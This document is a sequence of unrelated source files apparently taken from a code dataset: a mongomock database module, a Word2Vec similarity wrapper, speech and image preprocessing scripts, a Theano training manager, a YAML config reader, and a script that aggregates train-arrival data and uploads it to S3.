# patch_info = dd.from_delayed(patch_info,meta=meta_info).compute()
patch_info = patch_info.map_partitions(
lambda df: df.apply(return_line_info, axis=1), meta=meta_info
).compute(
scheduler="processes"
) # .values
# patch_info=patch_info.apply(return_line_info,axis=1)
patch_info = patch_info.loc[patch_info["annotation"] != "NA"]
if segmentation:
a = 1
if 0:
from parallel_utils import extract_patch_info
patch_info = extract_patch_info(
basename,
input_dir,
annotations,
threshold,
patch_size,
generate_finetune_segmentation,
target_class,
intensity_threshold,
target_threshold,
)
# @pysnooper.snoop("process_line.log")
def return_line_info(row):
xs = row["x"]
ys = row["y"]
xf = xs + patch_size
yf = ys + patch_size
print(basename, xs, ys)
# if is_valid_patch((purple_mask[xs:xf,ys:yf]>=intensity_threshold).compute(), threshold):#.compute()
# print(xs,ys, 'valid_patch')
if segmentation:
row["annotation"] = "segment"
# info=[basename,xs,ys,patch_size,'segment']
seg = segmentation_mask[xs:xf, ys:yf].compute()
# info=info+
row.iloc[-target_class:] = [(seg == i).mean() for i in range(target_class)]
# if generate_finetune_segmentation:
else:
row.iloc[-len(annotations) :] = [
is_coords_in_box(
coords=np.array([xs, ys]),
patch_size=patch_size,
boxes=masks[annotation],
)
for annotation in annotations
]
row["annotation"] = annotations[
row.iloc[-len(annotations) :].argmax()
] # [np.argmax(annotation_areas)]
# info=[basename,xs,ys,patch_size,main_annotation]+annotation_areas
# else:
# if segmentation:
# info = [basename, xs, ys, patch_size, 'NA'] + \
# [0. for i in range(target_class)]
# else:
# info = [basename, xs, ys, patch_size, 'NA'] + \
# [0. for i in range(len(annotations))]
return row # info
def seg_line(xs, ys, patch_size, segmentation_mask, target_class):
xf = xs + patch_size
yf = ys + patch_size
seg = segmentation_mask[xs:xf, ys:yf]
return [(seg == i).mean() for i in range(target_class)]
def annot_line(xs, ys, patch_size, masks, annotations):
return [
is_coords_in_box(
coords=np.array([xs, ys]),
patch_size=patch_size,
boxes=masks[annotation],
)
for annotation in annotations
]
| 36.147368 | 109 | 0.540478 |
a9de9895fb4cc27a494d724a2d9b9ae2e348f06d | 7,550 | py | Python | mongomock/database.py | ymoran00/mongomock | c580df1455f065114bc1ac057f10414e91d95b73 | [
"BSD-3-Clause"
] | null | null | null | mongomock/database.py | ymoran00/mongomock | c580df1455f065114bc1ac057f10414e91d95b73 | [
"BSD-3-Clause"
] | null | null | null | mongomock/database.py | ymoran00/mongomock | c580df1455f065114bc1ac057f10414e91d95b73 | [
"BSD-3-Clause"
] | null | null | null | import warnings
from . import CollectionInvalid
from . import InvalidName
from . import OperationFailure
from .collection import Collection
from mongomock import read_preferences
from mongomock import store
from six import string_types
try:
from bson import codec_options as bson_codec_options
from pymongo import ReadPreference
_READ_PREFERENCE_PRIMARY = ReadPreference.PRIMARY
except ImportError:
_READ_PREFERENCE_PRIMARY = read_preferences.PRIMARY
bson_codec_options = None
class Database(object):
def __init__(self, client, name, _store, read_preference=None):
self.name = name
self._client = client
self._collection_accesses = {}
self._store = _store or store.DatabaseStore()
self._read_preference = read_preference or _READ_PREFERENCE_PRIMARY
def __getitem__(self, coll_name):
return self.get_collection(coll_name)
def __getattr__(self, attr):
if attr.startswith('_'):
raise AttributeError(
"%s has no attribute '%s'. To access the %s collection, use database['%s']." %
(self.__class__.__name__, attr, attr, attr))
return self[attr]
def __repr__(self):
return "Database({0}, '{1}')".format(self._client, self.name)
@property
def client(self):
return self._client
@property
def read_preference(self):
return self._read_preference
@property
def codec_options(self):
if not bson_codec_options:
raise NotImplementedError(
'The codec options are not implemented in mongomock alone, you need to import '
'the pymongo library as well.')
return bson_codec_options.CodecOptions()
def _get_created_collections(self):
return self._store.list_created_collection_names()
def collection_names(self, include_system_collections=True, session=None):
warnings.warn('collection_names is deprecated. Use list_collection_names instead.')
if include_system_collections:
return list(self._get_created_collections())
return self.list_collection_names(session=session)
def list_collection_names(self, session=None):
if session:
raise NotImplementedError('Mongomock does not handle sessions yet')
return [
name for name in self._get_created_collections()
if not name.startswith('system.')
]
def get_collection(self, name, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
if read_concern:
raise NotImplementedError('Mongomock does not handle read_concern yet')
if read_preference is not None:
read_preferences.ensure_read_preference_type('read_preference', read_preference)
try:
return self._collection_accesses[name]
except KeyError:
collection = self._collection_accesses[name] = Collection(
self, name=name, write_concern=write_concern,
read_preference=read_preference or self.read_preference,
_db_store=self._store)
return collection
def drop_collection(self, name_or_collection, session=None):
if session:
raise NotImplementedError('Mongomock does not handle sessions yet')
if isinstance(name_or_collection, Collection):
name_or_collection._store.drop()
else:
self._store[name_or_collection].drop()
def _ensure_valid_collection_name(self, name):
# These are the same checks that are done in pymongo.
if not isinstance(name, string_types):
raise TypeError('name must be an instance of basestring')
if not name or '..' in name:
raise InvalidName('collection names cannot be empty')
if name[0] == '.' or name[-1] == '.':
raise InvalidName("collection names must not start or end with '.'")
if '$' in name:
raise InvalidName("collection names must not contain '$'")
if '\x00' in name:
raise InvalidName('collection names must not contain the null character')
def create_collection(self, name, **kwargs):
self._ensure_valid_collection_name(name)
if name in self.list_collection_names():
raise CollectionInvalid('collection %s already exists' % name)
if kwargs:
raise NotImplementedError('Special options not supported')
self._store.create_collection(name)
return self[name]
def rename_collection(self, name, new_name, dropTarget=False):
"""Changes the name of an existing collection."""
self._ensure_valid_collection_name(new_name)
# Reference for server implementation:
# https://docs.mongodb.com/manual/reference/command/renameCollection/
if not self._store[name].is_created:
raise OperationFailure(
'The collection "{0}" does not exist.'.format(name), 10026)
if new_name in self._store:
if dropTarget:
self.drop_collection(new_name)
else:
raise OperationFailure(
'The target collection "{0}" already exists'.format(new_name),
10027)
self._store.rename(name, new_name)
return {'ok': 1}
def dereference(self, dbref, session=None):
if session:
raise NotImplementedError('Mongomock does not handle sessions yet')
if not hasattr(dbref, 'collection') or not hasattr(dbref, 'id'):
raise TypeError('cannot dereference a %s' % type(dbref))
if dbref.database is not None and dbref.database != self.name:
raise ValueError('trying to dereference a DBRef that points to '
'another database (%r not %r)' % (dbref.database,
self.name))
return self[dbref.collection].find_one({'_id': dbref.id})
def command(self, command, **unused_kwargs):
if isinstance(command, string_types):
command = {command: 1}
if 'ping' in command:
return {'ok': 1.}
# TODO(pascal): Differentiate NotImplementedError for valid commands
# and OperationFailure if the command is not valid.
raise NotImplementedError(
'command is a valid Database method but is not implemented in Mongomock yet')
def with_options(
self, codec_options=None, read_preference=None, write_concern=None, read_concern=None):
if codec_options:
if not bson_codec_options:
raise NotImplementedError(
'The codec options are not implemented in mongomock alone, you need to import '
'the pymongo library as well.')
if codec_options != bson_codec_options.CodecOptions():
raise NotImplementedError('The codec options are not implemented yet')
if write_concern:
raise NotImplementedError(
'write_concern is a valid parameter for with_options but is not implemented yet in '
'mongomock')
if read_concern:
raise NotImplementedError(
'read_concern is a valid parameter for with_options but is not implemented yet in'
'mongomock')
return Database(
self._client, self.name, self._store, read_preference=self.read_preference)
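# A minimal usage sketch. It assumes the usual mongomock entry point
# (mongomock.MongoClient), which builds Database instances with a backing store;
# the calls shown are the ones implemented above.
#
#   import mongomock
#   client = mongomock.MongoClient()
#   db = client['my_db']                        # Database instance
#   db.create_collection('users')
#   db['users'].insert_one({'name': 'ann'})
#   db.rename_collection('users', 'people')
#   print(db.list_collection_names())           # -> ['people']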
| 39.94709 | 100 | 0.644503 |
bc1e2326a0a5b0e7a40bf78b903c703904993ebb | 3,362 | py | Python | GraduationDesign/SSFN_V5/Word2Vec.py | sivanWu0222/GraduationProject | 3f98d078b763dd84a246999879040c34cfbc5efb | [
"MIT"
] | 12 | 2019-04-27T11:17:16.000Z | 2022-02-27T14:03:12.000Z | GraduationDesign/SSFN_V5/Word2Vec.py | sivanWu0222/GraduationProject | 3f98d078b763dd84a246999879040c34cfbc5efb | [
"MIT"
] | 1 | 2022-03-21T12:31:29.000Z | 2022-03-26T03:01:14.000Z | GraduationDesign/SSFN_V5/Word2Vec.py | sivanWu0222/GraduationProject | 3f98d078b763dd84a246999879040c34cfbc5efb | [
"MIT"
] | null | null | null | from gensim.models import KeyedVectors
class Word2Vec():
def __init__(self, modelPath, kind='bin'):
"""
        Create a Word2Vec object.
        modelPath: path to the model file
        kind: model file type
            bin: binary file
            txt: text file
        return: None
"""
if kind != 'bin':
kind = False
else:
kind = True
print('loading word2vector model...')
self.model = KeyedVectors.load_word2vec_format(modelPath, binary=kind, unicode_errors='ignore')
def get_word_vector(self, word):
"""
        Get the vector for a word.
        word: the word to look up
        return: the word vector
"""
if word in self.model:
return self.model[word]
return None
def word_similarity(self, word1, word2):
"""
        Compute the similarity between two words.
        word1: the first word
        word2: the second word
        return: similarity between word1 and word2
"""
if word1 not in self.model or word2 not in self.model:
return 0
return self.model.similarity(word1, word2)
def get_similar_Words(self, word, maxReturnNum):
"""
        Get semantically similar words.
        word: the query word
        maxReturnNum: maximum number of words to return
        return: words and their similarities, as [(word, simi)...]
"""
if word not in self.model:
return None
return self.model.similar_by_word(word, topn=maxReturnNum)
def __cal_max_similarity(self, centerWord, wordList):
"""
        Compute the maximum similarity between a word and the words in a word list.
        centerWord: the word
        wordList: the word list
        return: maximum similarity between the word and any word in the list
"""
maxSimi = -1
if centerWord in wordList:
return 1
else:
for word in wordList:
temp = self.word_similarity(centerWord, word)
if temp == 0: continue
if temp > maxSimi: maxSimi = temp
if maxSimi == -1: return 0
return maxSimi
def sentence_similarity(self, sentence1Words, sentence2Words):
"""
        Compute sentence similarity.
        sentence1Words: word list of sentence 1
        sentence2Words: word list of sentence 2
        return: similarity between the two sentences
"""
if len(sentence1Words) == 0 or len(sentence2Words) == 0:
return 0
vector1 = [self.__cal_max_similarity(word, sentence2Words) for word in sentence1Words]
vector2 = [self.__cal_max_similarity(word, sentence1Words) for word in sentence2Words]
return (sum(vector1) + sum(vector2)) / (len(vector1) + len(vector2))
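    # Worked sketch of the score above (the similarity numbers are made up, purely to
    # illustrate the symmetric max-similarity average):
    #   sentence1Words = ['cat', 'likes', 'fish'], sentence2Words = ['dog', 'likes', 'meat']
    #   vector1 (best match of each word of sentence 1 in sentence 2) -> e.g. [0.7, 1.0, 0.6]
    #   vector2 (best match of each word of sentence 2 in sentence 1) -> e.g. [0.7, 1.0, 0.5]
    #   similarity = (2.3 + 2.2) / (3 + 3) = 0.75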
def sentence_weight_similarity(self, sentence1Words, sentence2Words, weightVector1, weightVector2):
"""
        Compute sentence similarity (weighted).
        Each word has a corresponding weight.
        sentence1Words: word list of sentence 1
        sentence2Words: word list of sentence 2
        weightVector1: weight vector of sentence 1
        weightVector2: weight vector of sentence 2
        return: similarity between the two sentences
"""
if len(sentence1Words) == 0 or len(sentence2Words) == 0:
return 0
if len(sentence1Words) != len(weightVector1) or len(sentence2Words) != len(weightVector2):
raise Exception('length of word list and weight vector is different')
vector1 = [self.__cal_max_similarity(word, sentence2Words) * weight for word, weight in
zip(sentence1Words, weightVector1)]
vector2 = [self.__cal_max_similarity(word, sentence1Words) * weight for word, weight in
zip(sentence2Words, weightVector2)]
return (sum(vector1) + sum(vector2)) / (sum(weightVector1) + sum(weightVector2)) | 28.982759 | 103 | 0.582689 |
d75a2ae0a72dcd116d32dd579263f6b4afa25e2c | 303 | py | Python | rss/setup.py | yxy1996/ros-wifi-localization | 891b67dfd162708201e0347a7f757093a7553348 | [
"BSD-3-Clause"
] | 25 | 2018-04-27T22:04:27.000Z | 2022-03-14T20:50:45.000Z | rss/setup.py | yxy1996/ros-wifi-localization | 891b67dfd162708201e0347a7f757093a7553348 | [
"BSD-3-Clause"
] | 3 | 2018-04-23T12:00:04.000Z | 2021-08-20T02:00:12.000Z | rss/setup.py | yxy1996/ros-wifi-localization | 891b67dfd162708201e0347a7f757093a7553348 | [
"BSD-3-Clause"
] | 7 | 2019-06-19T17:36:34.000Z | 2021-09-07T13:59:11.000Z | ## ! DO NOT MANUALLY INVOKE THIS setup.py, USE CATKIN INSTEAD
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
# fetch values from package.xml
setup_args = generate_distutils_setup(
packages=['rss'],
package_dir={'': 'src'},
)
setup(**setup_args)
| 23.307692 | 61 | 0.755776 |
25c77d6239164b01491d8e551234d6cf9e5f9140 | 5,534 | py | Python | preprocess_alignment.py | andi611/Mockingjay-Speech-Representation | 8f41f5728bdb94497e939fee0d67c7f65729a035 | [
"MIT"
] | 105 | 2019-10-24T05:28:57.000Z | 2022-02-21T23:08:07.000Z | preprocess_alignment.py | aviasd/Mockingjay-Speech-Representation | c01aef3f98bbb3fd4b0fc1b61e77fb5d02a0e453 | [
"MIT"
] | 9 | 2020-02-17T06:39:53.000Z | 2022-03-14T08:46:35.000Z | preprocess_alignment.py | aviasd/Mockingjay-Speech-Representation | c01aef3f98bbb3fd4b0fc1b61e77fb5d02a0e453 | [
"MIT"
] | 19 | 2019-10-29T11:40:34.000Z | 2021-11-24T16:36:04.000Z | # -*- coding: utf-8 -*- #
"""*********************************************************************************************"""
# FileName [ preprocess_alignment.py ]
# Synopsis [ preprocess phone alignment for the LibriSpeech dataset ]
# Author [ Andy T. Liu (Andi611) ]
# Copyright [ Copyleft(c), Speech Lab, NTU, Taiwan ]
# Reference [ https://github.com/BogiHsu/Phone-Recognizer/blob/815cf9375045c053fa57d17fad0fa14fdc3c7bee/loader.py#L28 ]
"""*********************************************************************************************"""
###############
# IMPORTATION #
###############
import os
import pickle
import argparse
import numpy as np
import pandas as pd
from tqdm import tqdm
from pathlib import Path
from utility.audio import sample_rate, _stft_parameters
#############################
# PREPROCESS CONFIGURATIONS #
#############################
def get_preprocess_args():
parser = argparse.ArgumentParser(description='preprocess arguments for LibriSpeech dataset.')
parser.add_argument('--data_path', default='./data/libri_alignment', type=str, help='Path to raw LibriSpeech alignment')
parser.add_argument('--output_path', default='./data/libri_phone', type=str, help='Path to store output', required=False)
args = parser.parse_args()
return args
####################
# PHONE PREPROCESS #
####################
def phone_preprocess(data_path, output_path, sets, unaligned):
print('Data sets :')
for idx, s in enumerate(sets):
print('\t', idx, ':', s)
todo_sets = input('Please enter the index for preprocessing sets (seperate w/ space): ')
sets = [sets[int(s)] for s in todo_sets.split(' ')]
# compute phone2idx
idx = 0
phone2idx = {}
for s in sets:
print('')
print('Computing', s, 'data...')
for path in tqdm(list(Path(os.path.join(data_path, s)).rglob("*.txt"))):
check_name = path.as_posix().split('/')[-1].split('.')[0]
if check_name not in unaligned and check_name != 'unaligned': # ignore the unaligned files and `unaligned.txt` itself
for line in open(path).readlines():
phone = line.strip('\n').split(' ')[-1]
if phone not in phone2idx:
phone2idx[phone] = idx
idx += 1
print('Phone set:')
print(phone2idx)
print(len(phone2idx), 'distinct phones found in', sets)
with open(os.path.join(output_path, 'phone2idx.pkl'), "wb") as fp:
pickle.dump(phone2idx, fp)
for s in sets:
print('')
print('Preprocessing', s, 'data...')
todo = list(Path(os.path.join(data_path, s)).rglob("*.txt"))
print(len(todo),'audio files found in', s)
if not os.path.exists(os.path.join(output_path, s)):
os.makedirs(os.path.join(output_path, s))
print('Preprocessing phone alignments...', flush=True)
for path in tqdm(todo):
check_name = path.as_posix().split('/')[-1].split('.')[0]
if check_name not in unaligned and check_name != 'unaligned': # ignore the unaligned files and `unaligned.txt` itself
x = []
file = open(path).readlines()
for line in file:
line = line.strip('\n').split(' ')
x += time_to_frame(start_time=float(line[0]), end_time=float(line[1]), phone=phone2idx[line[2]])
x = np.asarray(x)
path_to_save = str(path).replace(data_path.split('/')[-1], output_path.split('/')[-1]).replace('txt', 'pkl')
with open(path_to_save, "wb") as fp:
pickle.dump(x, fp)
print('Phone preprocessing complete!')
#################
# TIME TO FRAME #
#################
def time_to_frame(start_time, end_time, phone):
phones = []
start_time = int(start_time * sample_rate)
end_time = int(end_time * sample_rate)
_, hop_length, win_length = _stft_parameters(sample_rate=sample_rate)
h_window = win_length * 0.5 # select the middle of a window
start_time = (start_time - h_window) if start_time >= h_window else 0
end_time = (end_time - h_window) if end_time >= h_window else 0
times = (end_time // hop_length) - (start_time // hop_length) \
+ (1 if start_time % hop_length == 0 else 0) - (1 if end_time % hop_length == 0 else 0)
phones += [phone] * int(times)
return phones
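# Worked sketch of the conversion above. The STFT settings are placeholders (the real
# values come from utility.audio's sample_rate and _stft_parameters); assume
# sample_rate=16000, hop_length=200, win_length=800:
#   start_time=0.5s, end_time=1.0s -> 8000 and 16000 samples
#   h_window = 0.5 * 800 = 400, so start_time -> 7600, end_time -> 15600
#   times = 15600//200 - 7600//200 + 1 - 1 = 40, so 40 frames are labelled with `phone`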
########
# MAIN #
########
def main():
# get arguments
args = get_preprocess_args()
# mkdir
if not os.path.exists(args.output_path):
os.makedirs(args.output_path)
# dump unaligned text
try:
file = open(os.path.join(args.data_path, 'train-clean-360/unaligned.txt')).readlines()
unaligned = [str(line).split('\t')[0].split(' ')[0] for line in file]
print('Unaligned list: ', unaligned)
unaligned_pkl = ['train-clean-360/' + u + '.npy' for u in unaligned]
with open(os.path.join(args.output_path, 'unaligned.pkl'), "wb") as fp:
pickle.dump(unaligned_pkl, fp)
except:
raise ValueError('Did not find unaligned.txt!')
# Process data
sets = ['train-clean-360', 'test-clean'] # only two sets available for now
# sets = ['train-clean-100','train-clean-360','train-other-500','dev-clean','dev-other','test-clean','test-other']
phone_preprocess(args.data_path, args.output_path, sets, unaligned)
if __name__ == '__main__':
main()
| 38.430556 | 129 | 0.573003 |
b550c0e3a7b2f4bc9917cd5921f9e8dd45643661 | 4,387 | py | Python | code/model/train.py | fegonda/icon_demo | d2d1b0148989187c1433597f9c3ae4357178c082 | [
"MIT"
] | null | null | null | code/model/train.py | fegonda/icon_demo | d2d1b0148989187c1433597f9c3ae4357178c082 | [
"MIT"
] | null | null | null | code/model/train.py | fegonda/icon_demo | d2d1b0148989187c1433597f9c3ae4357178c082 | [
"MIT"
] | null | null | null | #---------------------------------------------------------------------------
# train.py
#
# Author : Felix Gonda
# Date : July 10, 2015
# School : Harvard University
#
# Project : Master Thesis
# An Interactive Deep Learning Toolkit for
# Automatic Segmentation of Images
#
# Summary : This file contains the implementation of a prediction task
# thread. The prediction task is responsible for segmenting
# an entire image based on a trained model. It loads the trained
# model from file.
#---------------------------------------------------------------------------
import os
import sys
import signal
import threading
import time
import numpy as np
import mahotas
import theano
import theano.tensor as T
base_path = os.path.dirname(__file__)
sys.path.insert(1,os.path.join(base_path, '../common'))
sys.path.insert(2,os.path.join(base_path, '../database'))
from manager import Manager
from utility import Utility
from paths import Paths
from db import DB
#---------------------------------------------------------------------------
class Training(Manager):
#-------------------------------------------------------------------
# Reads the input image and normalize it. Also creates
# a version of the input image with corner pixels
# mirrored based on the sample size
# arguments: - path : directory path where image is located
# - id : the unique identifier of the image
# - pad : the amount to pad the image by.
# return : returns original image and a padded version
#-------------------------------------------------------------------
def __init__(self):
Manager.__init__( self, 'training' )
self.version = 0
#-------------------------------------------------------------------
# online training
#-------------------------------------------------------------------
def work(self, project):
print 'Training.work...'
if project == None:
return
# Offline training
offline = not self.online
if offline or project.type == 'UNET':
self.model.path = project.path_offline
self.model.train(offline=offline, mean=project.mean, std=project.std)
self.done = True
return
# Online training
if project is None:
#print 'no project...'
return
print 'trainable:', project.isTrainable()
#print 'training......running....'
if not project.isTrainable():
return
# check for new data
'''
if self.dataset.load( project ):
self.model.setTrainingData(
self.dataset.x,
self.dataset.y,
self.dataset.p,
self.dataset.l,
project.learningRate,
project.momentum)
'''
self.dataset.load( project )
#self.dataset.sample()
# cache the dataset
if not self.dataset.valid():
print 'invalid data...'
return
# train the classifier
self.model.train( offline=False, data=self.dataset, mean=project.mean, std=project.std)
#self.test_perf( project )
# save statistics
#self.dataset.save_stats( project )
print 'done:', self.done
def test_perf(self, project):
name = 'train-input_0037.tif'
path = '%s/%s'%(Paths.TrainGrayscale, name)
image = mahotas.imread( path )
image = Utility.normalizeImage( image )
results = self.model.predict( image=image, mean=project.mean, std=project.std, threshold=project.threshold)
n_membrane = len(results[ results == 1 ])
print 'n_membrane:', n_membrane
if n_membrane > 300000:
rev = DB.getRevision( self.model.id )
version = '%d_%d'%(self.version, n_membrane)
self.model.save_t( version )
self.version += 1
manager = None
def signal_handler(signal, frame):
if manager is not None:
manager.shutdown()
if __name__ == '__main__':
Utility.report_status('running training manager', '')
signal.signal(signal.SIGINT, signal_handler)
manager = Training( )
print 'manager:', manager
Manager.start( sys.argv, manager )
| 31.113475 | 115 | 0.530203 |
1086dd793e2b8ea7d9b1e32d68cf275553b03aac | 916 | py | Python | adapo/config.py | michaelimfeld/csgo-server-manager | 06cd883b0f46924f20b7fc48260c0d0cd471d6c9 | [
"MIT"
] | 3 | 2015-11-19T19:52:00.000Z | 2016-03-13T22:53:43.000Z | adapo/config.py | michaelimfeld/adapo | 06cd883b0f46924f20b7fc48260c0d0cd471d6c9 | [
"MIT"
] | null | null | null | adapo/config.py | michaelimfeld/adapo | 06cd883b0f46924f20b7fc48260c0d0cd471d6c9 | [
"MIT"
] | null | null | null | """
Provides a YAML configuration file reader.
"""
import yaml
from adapo.logger import Logger
class Config(object):
"""
YAML configuration file reader.
"""
def __init__(self, path):
self._cfg = None
self._log = Logger()
self._path = path
self.load_config()
def load_config(self):
"""
Loads config file.
"""
config_file = open(self._path, "r")
self._cfg = yaml.load(config_file)
config_file.close()
self._log.info("config file '%s' loaded" % self._path)
def __getattr__(self, attr):
"""
Returns configuration value by attribute.
"""
value = self._cfg.get(attr)
if not value:
self._log.warn(
"could not find value for key '{0}' in '{1}'"
.format(attr, self._path)
)
return value
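# A minimal usage sketch (the file name and keys are made up for illustration):
#
#   settings.yaml:
#     server: csgo.example.org
#     port: 27015
#
#   cfg = Config('settings.yaml')
#   cfg.server    # -> 'csgo.example.org'
#   cfg.port      # -> 27015
#   cfg.missing   # logs a warning and returns None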
| 22.9 | 62 | 0.530568 |
187bfd89bf56db61520e6e4074a511eeae1d369c | 9,279 | py | Python | zugdaten/upload_db_use_for_api.py | cfleschhut/virushack | 2fe7ded0be8672b066edef7fed52573794db2ba5 | [
"Apache-2.0"
] | null | null | null | zugdaten/upload_db_use_for_api.py | cfleschhut/virushack | 2fe7ded0be8672b066edef7fed52573794db2ba5 | [
"Apache-2.0"
] | null | null | null | zugdaten/upload_db_use_for_api.py | cfleschhut/virushack | 2fe7ded0be8672b066edef7fed52573794db2ba5 | [
"Apache-2.0"
] | null | null | null | """ Importiert die Backups aus dem Speicher und
uploaded tageweise in amazon s3 """
import os
import re
import pandas as pd
from datetime import datetime
# compatibility with ipython
try:
__IPYTHON__
os.chdir(os.path.dirname(__file__))
except: pass
from db import DatabaseWrapper
import json
import boto3
from pathlib import Path
import geopandas.tools
from shapely.geometry import Point
import pymysql
# download shapefiles
countries = geopandas.GeoDataFrame.from_file(
"https://raw.githubusercontent.com/AliceWi/TopoJSON-Germany/master/germany.json",
layer=1,
driver="TopoJSON")
# clean unnecessary columns
countries = countries[["id", "name", "geometry"]]
countries.columns = ["landkreise_id", "landkreis", "geometry"]
db = DatabaseWrapper("localhost", "hafasdb2", "hafas", "123")
# connection settings for the remote (AWS) database are read from sdd-db.conf
conf = json.load(open("sdd-db.conf", "r"))
connection_aws = pymysql.connect(
    host=conf["host"],
    user=conf["user"],
    password=conf["password"],
    db=conf["database"],
    charset='utf8mb4',
    cursorclass=pymysql.cursors.DictCursor)
connection_local = pymysql.connect(
host="localhost",
user="hafas",
password="123",
db="hafasdb2",
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
conf = json.load(open("sdd-db.conf", "r"))
# ask Parzival for permissions
db_aws = DatabaseWrapper(
database=conf["database"],
host=conf["host"],
user=conf["user"],
password=conf["password"]
)
path = "/home/bemootzer/Documents/SoftwareProjekte/stewardless/stewardless-crawler/dbbackup"
#path = "/media/bemootzer/SICHERUNG/stewardless/data"
re_sql = re.compile(r"arrival.*.sql")
#_, blacklist, _ = next(os.walk(os.path.join("summaries","data")))
_, blacklist, _ = next(os.walk(path))
blacklist.append("2020-02-01") # data not complete
for file in os.listdir(path):
if re_sql.match(file):
# LOAD BACKUP
#file = "arrivals-2020-03-01.sql"
date_string = file.replace("arrivals-", "").replace(".sql", "")
if date_string in blacklist:
print("skip %s" % file)
continue #skip because this file was already uploaded.
try:
print("current file", file)
os.system("mysql -u hafas -e 'CREATE DATABASE IF NOT EXISTS hafasdb2'")
os.system("mysql -u hafas -e 'DROP TABLE IF EXISTS hafasdb2.arrivals'")
os.system("mysql -u hafas --force hafasdb2 < %s" % os.path.join(path, file))
# RUN QUERY ON BACKUP FOR SCHEDULED STOPS
q = """
SELECT
T1.stopId,
T2.longitude,
T2.latitude,
lineProduct,
YEAR(scheduledWhen),
MONTH(scheduledWhen),
DAY(scheduledWhen),
HOUR(scheduledWhen), COUNT(*)
FROM arrivals AS T1
JOIN hafasdb.stations AS T2 ON T1.stopId = T2.id
WHERE lineProduct IN ("bus", "suburban", "regional", "nationalExpress", "national")
GROUP BY stopID, lineProduct, YEAR(scheduledWhen), MONTH(scheduledWhen), DAY(scheduledWhen), HOUR(scheduledWhen)
"""
df = pd.read_sql(q, connection_local)
df.columns = ["stopId", "lon", "lat", "lineProduct", "year", "month", "day", "hour", "planned_stops"]
def setDate(series):
return datetime(series["year"], series["month"], series["day"], series["hour"], )
df["date"] = df.apply(setDate, axis=1)
df.drop(["year", "month", "day", "hour"], axis=1, inplace=True)
df = df.dropna(subset=['lon', 'lat'])
# RUN QUERY ON BACKUP FOR CANCELLED STOPS
q = """
SELECT
T1.stopId,
T2.longitude,
T2.latitude,
lineProduct,
YEAR(scheduledWhen),
MONTH(scheduledWhen),
DAY(scheduledWhen),
HOUR(scheduledWhen),
COUNT(*)
FROM arrivals AS T1
JOIN hafasdb.stations AS T2 ON T1.stopId = T2.id
WHERE lineProduct IN ("bus", "suburban", "regional", "nationalExpress", "national")
AND cancelled = 1
GROUP BY stopID, lineProduct, YEAR(scheduledWhen), MONTH(scheduledWhen), DAY(scheduledWhen), HOUR(scheduledWhen)
"""
df_cancelled = pd.read_sql(q, connection_local)
df_cancelled.columns = ["stopId", "lon", "lat", "lineProduct", "year", "month", "day", "hour", "cancelled_stops"]
df_cancelled["date"] = df_cancelled.apply(setDate, axis=1)
df_cancelled.drop(["year", "month", "day", "hour"], axis=1, inplace=True)
df_cancelled = df_cancelled.dropna(subset=['lon', 'lat'])
# DO SOPHISTICATED MERGE WITH CUSTOM INDEX
def customIndex(series):
return str(series["stopId"]) + series["lineProduct"] + str(series["date"])
df["customIndex"] = df.apply(customIndex, axis=1)
df_cancelled["customIndex"] = df_cancelled.apply(customIndex, axis=1)
df = df.merge(
df_cancelled[["customIndex", "cancelled_stops"]],
on="customIndex",
how="left",
suffixes=(False, False))
# REPLACE NULL VALUES IN CANCELLED STOPS WITH 0
df.cancelled_stops.fillna(0, inplace=True)
# REMOVE CUSTOM INDEX
df.drop("customIndex", axis=1, inplace=True)
# WRITE A SHORT DAILY SUMMARY TO DISC
summary_path = os.path.join(os.getcwd(), "summaries", "data", date_string)
Path(summary_path).mkdir(parents=True, exist_ok=True)
tmp = json.loads(df.groupby(["lineProduct"]).sum()[["planned_stops", "cancelled_stops"]].to_json())
summary = {
"date": date_string,
"planned_stops": tmp["planned_stops"],
"cancelled_stops": tmp["cancelled_stops"]
}
# preprocess data
def coord_to_point(x):
return Point(x["lon"], x["lat"])
df["geometry"] = df[["lon", "lat"]].apply(coord_to_point, axis=1)
df = geopandas.GeoDataFrame(df, geometry="geometry")
df = geopandas.sjoin(df, countries, how="left", op='intersects')
df.drop(["index_right", "geometry"], axis=1, inplace=True)
df.dropna(inplace=True) # remove those that couldnt be matched to shapes
# aggregate by region
unique_regions = df["landkreise_id"].unique()
unique_datetimes = df["date"].unique()
unique_lineProducts = ['nationalExpress', 'regional', 'suburban', 'national', 'bus']
cnt = 0
result = []
for r in unique_regions:
cnt = cnt + 1
print("%2.4f" % (cnt / len(unique_regions)))
for d in unique_datetimes:
# for p in unique_lineProducts:
# cnt =+ 1
# if cnt % 100 == 0: print("%2,2f" % (cnt / (len(unique_datetimes)*len(unique_lineProducts)*len(unique_regions))))
# # filter accordingly
# df_filtered = df[(df.name==r) & (df.date == d) & (df.lineProduct == p)]
# score_reference = df_filtered.planned_stops.mean()
# score_absolute = df_filtered.cancelled_stops.mean()
# score_value = score_reference / score_absolute
# if len(df_filtered) > 0:
# result.append({
# "region": r,
# "lon": df_filtered.lon.iloc[0],
# "lat": df_filtered.lat.iloc[0],
# "date": d,
# "absolute_value": score_absolute,
# "reference_value": score_reference,
# "score_value": score_value,
# "name": unique_lineProducts
# })
# for all trains
                    df_filtered = df[(df.landkreise_id == r) & (df.date == d)]
score_reference = df_filtered.planned_stops.sum()
score_absolute = df_filtered.cancelled_stops.sum()
score_value = score_reference / score_absolute
if len(df_filtered) > 0:
result.append({
"region": r,
"lon": df_filtered.lon.iloc[0],
"lat": df_filtered.lat.iloc[0],
"date": d,
"absolute_value": score_absolute,
"reference_value": score_reference,
"score_value": score_value,
"name": "all",
"cnt": len(df_filtered)
})
df_db = pd.DataFrame(result, columns=["region", "lon", "lat", "date", "absolute_value", "reference_value", "score_value", "name", "cnt"])
q = """
INSERT INTO scores (ags) VALUES (%s)
"""
data = [("01234345", )]
db_aws.execute_many(q, data )
print(len(df_db))
with open(os.path.join(summary_path, date_string + ".json"), "w+") as f:
json.dump(summary, f, indent=2)
break
except:
pass
# UPLOAD JSON TO AMAZON
j = json.loads(df.to_json(orient="records"))
client_s3 = boto3.client("s3"#region_name="eu-central-1"
)
response = client_s3.put_object(
Bucket="sdd-s3-basebucket",
Body=json.dumps(j),
Key="zugdaten/" + "/".join(date_string.split("-")) + "/zugdaten.json"
)
print("upload successfull", file)
# for small uploads
# client = boto3.client("firehose")
# response = client.put_record(
